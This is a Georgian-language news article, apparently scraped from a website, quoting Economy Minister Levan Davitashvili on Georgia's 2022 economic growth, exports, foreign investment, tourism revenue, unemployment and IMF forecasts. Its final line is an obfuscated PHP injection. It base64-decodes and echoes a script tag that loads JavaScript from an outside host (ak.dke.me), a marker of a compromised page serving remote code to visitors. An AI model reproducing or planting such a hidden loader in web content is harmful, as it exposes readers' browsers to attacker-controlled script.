celsiusi
ავერსი საქკაბელი
საქართველოს ეკონომიკისა და მდგრადი განვითარების მინისტრ ლევან დავითაშვილის განცხადებით, 2022 წელს საქართველოს ეკონომიკა განაგრძობს ზრდას იმ გამოწვევების მიუხედავად, რომლებიც არსებობს რეგიონში და ზოგადად, გლობალურად ეკონომიკური განვითარების კუთხით.
 
დავითაშვილის თქმით, საქართველოს ეკონომიკამ სწრაფად მოახდინა პანდემიის შემდეგ აღდგენა.
 
„იცით, საქსტატმა დააზუსტა 2021 წლის ზრდის მონაცემები და საქართველოს ეკონომიკა შარშან 10.5 პროცენტით გაიზარდა. დაზუსტდა ასევე პირველი კვარტლების მონაცემები მიმდინარე წელს. 10.2 პროცენტი არის იანვარ-სექტემბერში საქართველოს ეკონომიკის ზრდა. ეკონომიკის ზრდაში მნიშვნელოვანი წვლილი შეიტანა ტრანსპორტისა და დასაწყობების, მშენებლობის, მრევწველობის და მომსახურების სექტორში, მათ შორის ტურიზმთან დაკავშირებულ საქმიანობებში ეკონომიკური აქტივობის გაზრდამ, თავის მხრივ, ეკონომიკური აქტივობის ზრდის მნიშვნელოვანი ფაქტორი იყო საგარეო ვაჭრობის, ტურიზმის, საერთაშორისო გადაზიდვების და სხვა არხებიდან მიღებული სავალუტო შემოდინებები. ექსპორტი გაიზარდა 34 პროცენტით და 4.5 მილიარდი დოლარი შეადგინა. აქედან, ადგილობრივი ექსპორტი 25 პროცენტით გაიზარდა და სამი მილიარდ ასი მილიონი შეადგინა. იანვარ-ოქტომბერში სავაჭრო ბრუნვა 15 მილიარდს გადასცდა და 33 პროცენტით გაზრდილია წინა წელთან შედარებით“, – განაცხადა ლევან დავითაშვილმა.
 
ლევან დავითაშვილის განმარტებით, მნიშვნელოვნად გაიზარდა პირდაპირი უცხოური ინვესტიციებიც.
 
„პირველი ორი კვარტლის მონაცემების მიხედვით, ჩვენ გვქონდა 922 მილიონ დოლარზე მეტი პირდაპირი უცხოური ინვესტიციები, საიდანაც 43 პროცენტზე მეტი ევროკავშირზე მოდის, ეს არის პირველი ორი კვარტლის მონაცემები. იმედი გვაქვს, რომ პირდაპირი უცხოური ინვესტიციების ზრდა დაფიქსირდება შემდეგ თვეებშიც, რომელზეც მოგვიანებით გვექნება უფრო დეტალური ინფორმაცია. ასევე, უნდა აღინიშნოს ტურიზმის აღდგენის დადებითი ტენდენციები. ტურიზმიდან შემოსავლები სრულად აღდგა, გადაცდა 2019 წლის მონაცემებსაც. საქართველომ ტურიზმიდან 2 მილიარდ 854 მილიონი აშშ დოლარი მიიღო. შემოსავალში ეს უფრო მეტია, ვიდრე 2019 წლის მონაცემებით, თუმცა ჩვენ ვფიქრობთ, რომ მომავალი წლების ზრდაში ტურიზმს კიდევ აქვს პოტენციალი და რეზერვები, რადგან ვიზიტორთა რაოდენობა სრულად არ არის აღდგენილი, ეს პოზიტიური ფაქტორი უნდა იყოს მომავალი წლების ეკონომიკურ ზრდაში, მათ შორის 2023 წლის“, – აღნიშნა ლევან დავითაშვილმა.
 
ამავდროულად, ლევან დავითაშვილი ამბობს, რომ დადებითი ტენდენციები აისახა დასაქმებაზე და მესამე კვარტლის მონაცემებით, უმუშევრობის დონე ისტორიულ მინიმუმზე დავიდა.
 
„საქსტატმა ძალიან საყურადღებო მონაცემები გამოაქვეყნა. მნიშვნელოვანია, აღინიშნოს, რომ დადებითი ტენდენციები აისახა დასაქმებაზე. საქართველოში მესამე კვარტლის მონაცემების მიხედვით, უმუშევრობის დონე ისტორიულ მინიმუმზე დავიდა, 15.6 პროცენტი არის ოფიციალური მონაცემები, რაც გვაქვს უმუშევრობასთან დაკავშირებით. ეს უკეთესი მონაცემებია, ვიდრე პანდემიის დროს, პანდემიამდე გვქონდა. მესამე კვარტალში დასაქმებულთა რაოდენობა წლიურად მნიშვნელოვნად, 77.5 ათასი ადამიანით გაიზარდა, ხოლო 2019 წლის მესამე კვარტლის მაჩვენებლთან შედარებით, 47.4 ათასი ადამიანით. აღნიშნული ცხადყოფს, რომ კონომიკის მაღალი ზრდაა, ეს აისახება მათ შორის დასაქმებაზე, რაც ჩვენთვის მთავარი ამოცანაა, რომ ინკლუზიურად სარგებელი მიიღოს უფრო მეტმა მოქალაქემ“, – განაცხადა ლევან დავითაშვილმა.
 
მინისტრის თქმით, საქართველოს რეგიონში ერთ-ერთი ყველაზე მაღალი ეკონომიკური ზრდა აქვს.
 
„საერთაშორისო სავალუტო ფონდის მონაცემების მიხედვით, ჩვენ მიმდინარე წელს უნდა გვქონდეს 10-პროცენტანი ეკონომიკური ზრდა, ეს არის ჩვენი პარტნიორის, საერთაშორისო სავალუტო ფონდის პროგნოზი და პროგნოზი დამაიმედებელია შემდეგი რამდენიმე წლის განმავლობაში. 2022-27 წლებში, შემდეგი ხუთი წლის განმავლობაში საქართველოს რეგიონში ერთ-ერთი ყველაზე მაღალი ეკონომიკური ზრდა უნდა ჰქონდეს, უნდა ჰქონდეს ყველაზე მაღალი ეკონომიკური ზრდა ევროპაში – 5.8 პროცენტი არის საერთაშორისო სავალუტო ფონდის პროგნოზი“, – აღნიშნა ლევან დავითაშვილმა მთავრობის დღევანდელი სხდომის დასრულების შემდეგ გამართულ ბრიფინგზე.
601
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");